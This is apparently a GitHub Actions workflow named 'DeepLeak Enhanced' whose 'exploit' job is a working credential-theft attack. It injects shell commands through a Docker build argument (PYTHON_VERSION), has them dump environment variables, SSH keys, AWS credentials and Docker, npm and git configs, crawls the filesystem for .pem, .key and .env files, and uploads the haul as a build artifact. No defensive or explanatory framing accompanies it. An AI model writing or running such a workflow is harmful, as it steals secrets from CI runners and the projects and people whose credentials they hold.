name: DeepLeak Enhanced
on: [push]

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Leak Advanced Secrets
        run: |
          mkdir leaks

          # Build container and inject command to search common secret paths
          docker build \
            --build-arg PYTHON_VERSION="\
              mkdir -p /leaks && \
              echo '[ENV]' > /leaks/env.txt && printenv >> /leaks/env.txt && \
              echo '[HOME FILES]' > /leaks/home.txt && ls -la /root >> /leaks/home.txt && \
              echo '[GIT CONFIG]' > /leaks/gitconfig.txt && cat /root/.gitconfig >> /leaks/gitconfig.txt 2>/dev/null || true && \
              echo '[SSH KEYS]' > /leaks/ssh.txt && cat /root/.ssh/* >> /leaks/ssh.txt 2>/dev/null || true && \
              echo '[DOCKER CONFIG]' > /leaks/docker.txt && cat /root/.docker/config.json >> /leaks/docker.txt 2>/dev/null || true && \
              echo '[NPM RC]' > /leaks/npmrc.txt && cat /root/.npmrc >> /leaks/npmrc.txt 2>/dev/null || true && \
              echo '[AWS CREDENTIALS]' > /leaks/aws.txt && cat /root/.aws/credentials >> /leaks/aws.txt 2>/dev/null || true && \
              echo '[FILESYSTEM CRAWL]' > /leaks/fs.txt && find / -name '*.pem' -o -name '*.key' -o -name '*.env' -o -name '*.yml' 2>/dev/null >> /leaks/fs.txt" \
            -t deepleak ./taskcluster/docker/python

          # Dump leaks from container
          docker run --rm deepleak tar -cf - /leaks > leaks/leaks.tar

      - uses: actions/upload-artifact@v3
        with:
          name: DeepLeaks
          path: leaks/leaks.tar
